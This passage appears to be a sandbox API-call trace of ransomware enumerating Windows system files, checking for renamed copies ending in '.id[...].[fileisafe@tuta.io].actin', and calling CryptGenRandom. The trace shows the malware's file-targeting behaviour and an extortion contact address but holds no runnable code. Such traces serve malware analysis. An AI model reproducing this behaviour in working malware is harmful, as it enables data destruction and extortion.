Files\\System\\msadc\\en-US\\msadcor.dll.mui" (normalized: "c:\\program files\\common files\\system\\msadc\\en-us\\msadcor.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0148.912] GetFileSizeEx (in: hFile=0x2f8, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=6144) returned 1 [0148.912] CloseHandle (hObject=0x2f8) returned 1 [0148.912] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msadcor.dll.mui" (normalized: "c:\\program files\\common files\\system\\msadc\\en-us\\msadcor.dll.mui")) returned 0x20 [0148.912] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msadcor.dll.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\system\\msadc\\en-us\\msadcor.dll.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0148.912] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msadcor.dll.mui" (normalized: "c:\\program files\\common files\\system\\msadc\\en-us\\msadcor.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0148.912] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0148.912] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msaddsr.dll.mui" (normalized: "c:\\program files\\common files\\system\\msadc\\en-us\\msaddsr.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0148.913] GetFileSizeEx (in: hFile=0x2f8, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=14336) returned 1 [0148.913] CloseHandle (hObject=0x2f8) returned 1 [0148.913] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msaddsr.dll.mui" (normalized: "c:\\program files\\common files\\system\\msadc\\en-us\\msaddsr.dll.mui")) returned 0x20 [0148.913] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msaddsr.dll.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\system\\msadc\\en-us\\msaddsr.dll.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0148.913] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msaddsr.dll.mui" (normalized: "c:\\program files\\common files\\system\\msadc\\en-us\\msaddsr.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0148.913] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0148.913] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msdaprsr.dll.mui" (normalized: "c:\\program files\\common files\\system\\msadc\\en-us\\msdaprsr.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0148.914] GetFileSizeEx (in: hFile=0x2f8, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=7680) returned 1 [0148.914] CloseHandle (hObject=0x2f8) returned 1 [0148.914] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msdaprsr.dll.mui" (normalized: "c:\\program files\\common files\\system\\msadc\\en-us\\msdaprsr.dll.mui")) returned 0x20 [0148.914] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msdaprsr.dll.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\system\\msadc\\en-us\\msdaprsr.dll.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0148.914] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msdaprsr.dll.mui" (normalized: "c:\\program files\\common files\\system\\msadc\\en-us\\msdaprsr.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0148.914] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0148.914] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msdaremr.dll.mui" (normalized: "c:\\program files\\common files\\system\\msadc\\en-us\\msdaremr.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0148.914] GetFileSizeEx (in: hFile=0x2f8, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=6144) returned 1 [0148.914] CloseHandle (hObject=0x2f8) returned 1 [0148.915] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msdaremr.dll.mui" (normalized: "c:\\program files\\common files\\system\\msadc\\en-us\\msdaremr.dll.mui")) returned 0x20 [0148.915] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msdaremr.dll.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\system\\msadc\\en-us\\msdaremr.dll.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0148.915] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msdaremr.dll.mui" (normalized: "c:\\program files\\common files\\system\\msadc\\en-us\\msdaremr.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0148.915] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0148.915] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadce.dll" (normalized: "c:\\program files\\common files\\system\\msadc\\msadce.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0148.916] GetFileSizeEx (in: hFile=0x2f8, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=695296) returned 1 [0148.916] CloseHandle (hObject=0x2f8) returned 1 [0148.916] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadce.dll" (normalized: "c:\\program files\\common files\\system\\msadc\\msadce.dll")) returned 0x20 [0148.916] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadce.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\system\\msadc\\msadce.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0148.916] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadce.dll" (normalized: "c:\\program files\\common files\\system\\msadc\\msadce.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0148.916] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0148.916] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadcer.dll" (normalized: "c:\\program files\\common files\\system\\msadc\\msadcer.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0148.917] GetFileSizeEx (in: hFile=0x2f8, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=2560) returned 1 [0148.917] CloseHandle (hObject=0x2f8) returned 1 [0148.917] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadcer.dll" (normalized: "c:\\program files\\common files\\system\\msadc\\msadcer.dll")) returned 0x20 [0148.917] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadcer.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\system\\msadc\\msadcer.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0148.917] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadcer.dll" (normalized: "c:\\program files\\common files\\system\\msadc\\msadcer.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0148.917] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0148.917] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadco.dll" (normalized: "c:\\program files\\common files\\system\\msadc\\msadco.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0148.917] GetFileSizeEx (in: hFile=0x2f8, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=242688) returned 1 [0148.917] CloseHandle (hObject=0x2f8) returned 1 [0148.917] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadco.dll" (normalized: "c:\\program files\\common files\\system\\msadc\\msadco.dll")) returned 0x20 [0148.917] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadco.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\system\\msadc\\msadco.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0148.917] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadco.dll" (normalized: "c:\\program files\\common files\\system\\msadc\\msadco.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0148.918] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0148.918] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadcor.dll" (normalized: "c:\\program files\\common files\\system\\msadc\\msadcor.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0148.918] GetFileSizeEx (in: hFile=0x2f8, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=2560) returned 1 [0148.918] CloseHandle (hObject=0x2f8) returned 1 [0148.918] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadcor.dll" (normalized: "c:\\program files\\common files\\system\\msadc\\msadcor.dll")) returned 0x20 [0148.919] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadcor.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\system\\msadc\\msadcor.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0148.919] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadcor.dll" (normalized: "c:\\program files\\common files\\system\\msadc\\msadcor.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0148.919] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0148.919] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadds.dll" (normalized: "c:\\program files\\common files\\system\\msadc\\msadds.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0148.919] GetFileSizeEx (in: hFile=0x2f8, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=279552) returned 1 [0148.919] CloseHandle (hObject=0x2f8) returned 1 [0148.919] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadds.dll" (normalized: "c:\\program files\\common files\\system\\msadc\\msadds.dll")) returned 0x20 [0148.919] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadds.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\system\\msadc\\msadds.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0148.919] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadds.dll" (normalized: "c:\\program files\\common files\\system\\msadc\\msadds.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0148.919] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0148.919] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msaddsr.dll" (normalized: "c:\\program files\\common files\\system\\msadc\\msaddsr.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0148.920] GetFileSizeEx (in: hFile=0x2f8, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=2560) returned 1 [0148.920] CloseHandle (hObject=0x2f8) returned 1 [0148.920] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msaddsr.dll" (normalized: "c:\\program files\\common files\\system\\msadc\\msaddsr.dll")) returned 0x20 [0148.920] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msaddsr.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\system\\msadc\\msaddsr.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0148.920] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msaddsr.dll" (normalized: "c:\\program files\\common files\\system\\msadc\\msaddsr.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0148.920] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0148.920] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msdaprsr.dll" (normalized: "c:\\program files\\common files\\system\\msadc\\msdaprsr.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0148.921] GetFileSizeEx (in: hFile=0x2f8, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=2560) returned 1 [0148.921] CloseHandle (hObject=0x2f8) returned 1 [0148.921] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msdaprsr.dll" (normalized: "c:\\program files\\common files\\system\\msadc\\msdaprsr.dll")) returned 0x20 [0148.921] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msdaprsr.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\system\\msadc\\msdaprsr.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0148.921] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msdaprsr.dll" (normalized: "c:\\program files\\common files\\system\\msadc\\msdaprsr.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0148.921] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0148.921] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msdaprst.dll" (normalized: "c:\\program files\\common files\\system\\msadc\\msdaprst.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0148.922] GetFileSizeEx (in: hFile=0x2f8, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=356352) returned 1 [0148.922] CloseHandle (hObject=0x2f8) returned 1 [0148.922] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msdaprst.dll" (normalized: "c:\\program files\\common files\\system\\msadc\\msdaprst.dll")) returned 0x20 [0148.922] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msdaprst.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\system\\msadc\\msdaprst.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0148.922] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msdaprst.dll" (normalized: "c:\\program files\\common files\\system\\msadc\\msdaprst.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0148.922] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0148.922] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msdarem.dll" (normalized: "c:\\program files\\common files\\system\\msadc\\msdarem.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0148.923] GetFileSizeEx (in: hFile=0x2f8, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=221696) returned 1 [0148.923] CloseHandle (hObject=0x2f8) returned 1 [0148.923] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msdarem.dll" (normalized: "c:\\program files\\common files\\system\\msadc\\msdarem.dll")) returned 0x20 [0148.923] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msdarem.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\system\\msadc\\msdarem.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0148.923] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msdarem.dll" (normalized: "c:\\program files\\common files\\system\\msadc\\msdarem.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0148.923] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0148.923] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msdaremr.dll" (normalized: "c:\\program files\\common files\\system\\msadc\\msdaremr.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0148.924] GetFileSizeEx (in: hFile=0x2f8, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=2560) returned 1 [0148.924] CloseHandle (hObject=0x2f8) returned 1 [0148.924] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msdaremr.dll" (normalized: "c:\\program files\\common files\\system\\msadc\\msdaremr.dll")) returned 0x20 [0148.924] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msdaremr.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\system\\msadc\\msdaremr.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0148.924] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msdaremr.dll" (normalized: "c:\\program files\\common files\\system\\msadc\\msdaremr.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0148.924] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0148.924] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msdfmap.dll" (normalized: "c:\\program files\\common files\\system\\msadc\\msdfmap.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0148.925] GetFileSizeEx (in: hFile=0x2f8, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=31744) returned 1 [0148.925] CloseHandle (hObject=0x2f8) returned 1 [0148.925] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msdfmap.dll" (normalized: "c:\\program files\\common files\\system\\msadc\\msdfmap.dll")) returned 0x20 [0148.925] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msdfmap.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\system\\msadc\\msdfmap.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0148.925] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msdfmap.dll" (normalized: "c:\\program files\\common files\\system\\msadc\\msdfmap.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0148.925] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0148.925] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\msdasqlr.dll.mui" (normalized: "c:\\program files\\common files\\system\\ole db\\en-us\\msdasqlr.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0148.927] GetFileSizeEx (in: hFile=0x2f8, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=6144) returned 1 [0148.927] CloseHandle (hObject=0x2f8) returned 1 [0148.927] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\msdasqlr.dll.mui" (normalized: "c:\\program files\\common files\\system\\ole db\\en-us\\msdasqlr.dll.mui")) returned 0x20 [0148.927] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\msdasqlr.dll.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\system\\ole db\\en-us\\msdasqlr.dll.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0148.927] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\msdasqlr.dll.mui" (normalized: "c:\\program files\\common files\\system\\ole db\\en-us\\msdasqlr.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0148.927] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0148.927] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\oledb32r.dll.mui" (normalized: "c:\\program files\\common files\\system\\ole db\\en-us\\oledb32r.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0148.928] GetFileSizeEx (in: hFile=0x2f8, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=48128) returned 1 [0148.928] CloseHandle (hObject=0x2f8) returned 1 [0148.928] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\oledb32r.dll.mui" (normalized: "c:\\program files\\common files\\system\\ole db\\en-us\\oledb32r.dll.mui")) returned 0x20 [0148.928] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\oledb32r.dll.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\system\\ole db\\en-us\\oledb32r.dll.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0148.928] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\oledb32r.dll.mui" (normalized: "c:\\program files\\common files\\system\\ole db\\en-us\\oledb32r.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0148.928] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0148.928] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\sqloledb.rll.mui" (normalized: "c:\\program files\\common files\\system\\ole db\\en-us\\sqloledb.rll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0148.929] GetFileSizeEx (in: hFile=0x2f8, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=44032) returned 1 [0148.929] CloseHandle (hObject=0x2f8) returned 1 [0148.929] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\sqloledb.rll.mui" (normalized: "c:\\program files\\common files\\system\\ole db\\en-us\\sqloledb.rll.mui")) returned 0x20 [0148.929] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\sqloledb.rll.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\system\\ole db\\en-us\\sqloledb.rll.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0148.929] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\sqloledb.rll.mui" (normalized: "c:\\program files\\common files\\system\\ole db\\en-us\\sqloledb.rll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0148.929] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, 